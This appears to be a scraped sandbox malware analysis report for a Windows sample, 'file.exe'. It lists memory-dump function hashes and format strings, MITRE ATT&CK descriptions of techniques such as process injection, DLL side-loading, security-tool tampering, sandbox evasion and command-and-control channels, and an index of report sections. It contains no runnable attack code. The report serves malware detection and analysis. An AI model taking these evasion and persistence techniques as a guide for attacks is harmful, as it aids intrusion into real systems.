Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 898bb058d0ab2b9c0ac280567dc8e7f873b91f167fce5f6781714057eb143810
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 4AC01232150644AFC7119A95CD01F0177A9E798B40F000021F20447670C531E810D644

Function 01670310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 1da888a1ffd23f2f6d1ed23ebb64a8b3348727ab7cd13932615a5819eb462a53
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 7AD01236100249EFCB01DF51C890D9AB72BFBD8710F108019FD19077108A31ED62DA50

Function 01650750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 1952683112a5c17352a39a567507af7f6c6cb408be327dfceb1eb8dbd3d4321c
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 15C04C757015418FCF15DB19D794F4577E4F754740F1518D0E905CB721E724EC01CA10

Function 01692890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0169293C
___swprintf_l.LIBCMT ref: 0169295E
___swprintf_l.LIBCMT ref: 016929A3
___swprintf_l.LIBCMT ref: 016CA52E

Strings

ffff:, xrefs: 016CA504
::ffff:0:%u.%u.%u.%u, xrefs: 016CA54E
::%hs%u.%u.%u.%u, xrefs: 016CA527
:%u.%u.%u.%u, xrefs: 016CA5B8

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 77989b502df8ef079012760f1be885a0010c41df6be4798d49829ce6bbda7714
Instruction ID: 912fbd5fb47ec098614e82d2b7318654891f0673a3deb3bfade57faddd848c31
Opcode Fuzzy Hash: 77989b502df8ef079012760f1be885a0010c41df6be4798d49829ce6bbda7714
Instruction Fuzzy Hash: 6D51D4A5A00116BFCF21DB9D8D9097EFBBCBB18240754C12DE4A5D7641E334DE058BE0

Function 01702410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017024A6
___swprintf_l.LIBCMT ref: 017024E2
___swprintf_l.LIBCMT ref: 0170257D
___swprintf_l.LIBCMT ref: 017025A3
___swprintf_l.LIBCMT ref: 017025C8
___swprintf_l.LIBCMT ref: 01702608

Strings

ffff:, xrefs: 0170247D, 0170249D
:%u.%u.%u.%u, xrefs: 017025FF
::ffff:0:%u.%u.%u.%u, xrefs: 017024DA
::%hs%u.%u.%u.%u, xrefs: 0170249E

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: fb378b6138d65276b250b2cec7bcedd460d660a1330e3d0363304de6000a092a
Instruction ID: 6b00d90878d125475011c0e2f04c22026e37f60639f79baa0c0a0bca32ad20b7
Opcode Fuzzy Hash: fb378b6138d65276b250b2cec7bcedd460d660a1330e3d0363304de6000a092a
Instruction Fuzzy Hash: 7751F572A00745EFDB32DE5CCC9487EFBF9AB44204B54849AF4D6D3682D674DE008B64

Function 017020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0170214F
___swprintf_l.LIBCMT ref: 01702172

Strings

[, xrefs: 0170212B
]:%u, xrefs: 01702169
%%%u, xrefs: 01702146

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: aaa5a79c6ec5b709efb7ae89c911defc53617fb41a6b928e9e9deae4925911a6
Instruction ID: 0becd213493324b23ab71b81a621e2c2c47cd97c6f91266c52b74c59ccb431e3
Opcode Fuzzy Hash: aaa5a79c6ec5b709efb7ae89c911defc53617fb41a6b928e9e9deae4925911a6
Instruction Fuzzy Hash: AE21517BA00219EBDB11DF79CC44ABEBBF9EF54654F54011AE905E3241E730D9058BA1

Function 01702300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0170238D
___swprintf_l.LIBCMT ref: 017023B3

Strings

%%%u, xrefs: 01702384
]:%u, xrefs: 017023AA

Memory Dump Source

Source File: 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp, Offset: 01620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1620000_file.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 3d30b0e9cba9f9192b10c4bd355d9328ffe061cb48f944746da201fe711fbef3
Instruction ID: 98447f995453fbc98a7af8ba9df55fa7892e72dda67ad710df150096a73b5a39
Opcode Fuzzy Hash: 3d30b0e9cba9f9192b10c4bd355d9328ffe061cb48f944746da201fe711fbef3
Instruction Fuzzy Hash: AD318472A00219EFDB21DF2DCC44BEEF7F8EB44614F55455AE949E3281EB309A448BA0

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
file.exe

Function 069D39E8 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Function 069C4260 Relevance: 4.4, Strings: 3, Instructions: 615
COMMON

Function 069D4CFA Relevance: 3.8, Strings: 2, Instructions: 1342
COMMON

Function 06CA35B0 Relevance: 3.1, Strings: 2, Instructions: 639
COMMON

Function 069C4250 Relevance: 2.7, Strings: 2, Instructions: 167
COMMON

Function 06E4E6C0 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Function 06CA5D48 Relevance: 4.2, Strings: 3, Instructions: 482
COMMON

Function 06CAC160 Relevance: 4.1, Strings: 3, Instructions: 373
COMMON

Function 06CA7B78 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 069529D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Function 06CA5800 Relevance: 2.9, Strings: 2, Instructions: 351
COMMON

Function 06CA1889 Relevance: 2.7, Strings: 2, Instructions: 179
COMMON